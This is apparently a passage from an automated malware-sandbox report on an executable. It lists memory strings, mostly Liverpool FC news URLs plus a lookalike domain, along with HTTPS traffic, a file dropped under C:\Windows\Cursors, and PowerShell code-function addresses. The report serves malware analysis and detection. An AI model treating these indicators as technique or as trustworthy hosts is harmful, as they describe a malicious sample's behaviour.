                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4&l
                      Source: powershell.exe, 00000005.00000002.536067747.00000000058E2000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.535279406.0000000005E25000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
                      Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
                      Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/featuresnC
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeFile created: C:\Windows\Cursors\WQzhTjfBsYrOnkhJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_030DD4A1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_030DD4B0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0795B7B7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0795B7C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0337E870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03370040
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03372E20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0337E870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0337E870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03372E20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03372E20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03372E20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03372E20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08016D78
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080165A8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0801A800
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08010040
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0801A330
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08014520
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08014E88
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080196B8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08050830
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0805E330
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080B7E00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080BF500
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080B7E00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_03378EAB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B98298
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B98790
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B99F40
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B9C338
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B991E7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B9E170
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B9A770
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B9C338
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B9C8C0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B96D28
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B96D19
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0787CEE0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0787B6F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0787F2AA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0787DA51
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0787CED1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07874568
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078733D0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07876375
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07874A20
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078BDF90
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_078B65A8
